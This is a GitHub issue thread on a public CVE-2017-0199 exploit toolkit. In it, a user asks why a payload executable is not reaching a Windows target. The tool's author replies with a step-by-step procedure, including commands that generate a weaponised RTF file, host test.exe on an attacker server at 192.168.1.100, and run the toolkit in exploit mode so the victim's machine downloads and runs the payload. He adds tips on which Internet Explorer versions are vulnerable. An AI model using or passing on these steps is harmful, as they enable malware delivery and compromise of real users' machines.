CVE-2017-0199 icon indicating copy to clipboard operation
CVE-2017-0199 copied to clipboard

Published 20 hours ago verified publisher icon bhdresh

Request for help please

Open ITLerner opened this issue 6 years ago • 7 comments

I am using kali linux2. I generated rtf file using command python cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u http://192.168.1.100:443 Then I use command python cve-2017-0199_toolkit.py -M exp -p 443 -e http://192.168.1.100/test.exe for running exploitation mode... When i run test.rtf on a windows machine I got "Received GET method from 192.168.1.108" twice .. Issue is that test.exe is NOT delivering there on the windows machine. Please help me. Thanks

ITLerner avatar Dec 06 '17 09:12 ITLerner

I think you missed to specify port in -e argument, it should be something like as http://192.168.1.100:443/test.exe because tool is running on 443 and not on 80

On 6 Dec 2017 1:48 p.m., "ITLerner" [email protected] wrote:

I am using kali linux2. I generated rtf file using command python cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u http://192.168.1.100:443 Then I use command python cve-2017-0199_toolkit.py -M exp -p 443 -e http://192.168.1.100/test.exe for running exploitation mode... When i run test.rtf on a windows machine I got "Received GET method from 192.168.1.108" twice .. Issue is that test.exe is NOT delivering there on the windows machine. Please help me. Thanks

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/bhdresh/CVE-2017-0199/issues/58, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLbnVVitvtAnYO6LlC0GQAdxDyA6Hks5s9mLggaJpZM4Q3ocX .

bhdresh avatar Dec 06 '17 14:12 bhdresh

Dear bhdresh i am extremely thankful for your reply. I changed -e argument same as you mentioned please. I have still same issue . Receiving "Received GET method from 192.168.1.108" twice (in two lines) . I am confused on HTA .. I think HTA should delivered payload But in my case i dont have added this. Please help me how can i add hta..

ITLerner avatar Dec 06 '17 16:12 ITLerner

I see, let's start with basic setup then,

Step 1) Generate RTF using below command,

python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.1.100/logo.doc

Step 2) Copy test.exe in to /tmp

Step 3) Start toolkit in exploit mode using following command,

python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.1.100/test.exe -l /tmp/test.exe

Step 4) Open RTF file on target.

Note: it was pointed out in metasploit thread that Internet Explorer version should be at least IE10 (rapid7/metasploit-framework#8220 https://github.com/rapid7/metasploit-framework/issues/8220).

Hope this will help :)

On 6 Dec 2017 8:26 p.m., "ITLerner" [email protected] wrote:

Dear bhdresh i am extremely thankful for your reply. I changed -e argument same as you mentioned please. I have still same issue . Receiving "Received GET method from 192.168.1.108" twice (in two lines) . I am confused on HTA .. I think HTA should delivered payload But in my case i dont have added this. Please help me how can i add hta..

— You are receiving this because you commented.

Reply to this email directly, view it on GitHub https://github.com/bhdresh/CVE-2017-0199/issues/58#issuecomment-349693261, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLRWJU7viiHLSHjt3nY0X4meOZi1Jks5s9sBNgaJpZM4Q3ocX .

bhdresh avatar Dec 06 '17 19:12 bhdresh

Thanks again for your time and reply. I did the same as you mentioned. This time I didn't find anything when Start toolkit in exploit mode. even no "Received GET method from..." I am unable to understand what is the logo.doc in -u argument ... ?

ITLerner avatar Dec 07 '17 08:12 ITLerner

Are you sure the target is vulnerable and IE version is 10+?

Regarding your query about arguments, below image from README.md should be able to help you understand the flow and role of arguments being used,

https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg

Thanks.

bhdresh avatar Dec 07 '17 09:12 bhdresh

yes, i am 100 % sure Please. I am testing it on windows 8.1, IE 11. When I use -u command without logo.doc (mentioned at the end of the command) then I received ( "Received GET method from...") which indicates system Vulnerability. but my payload is not delivering ... If I used -u arrangement with logo.doc then i didn't receive any response. Please explain what is logo.doc?? hope you will understand my point and help me. Regards

ITLerner avatar Dec 07 '17 10:12 ITLerner

What is logo.doc ? Can this be used on remote server ? or just local ?

spadacio avatar Jan 17 '18 20:01 spadacio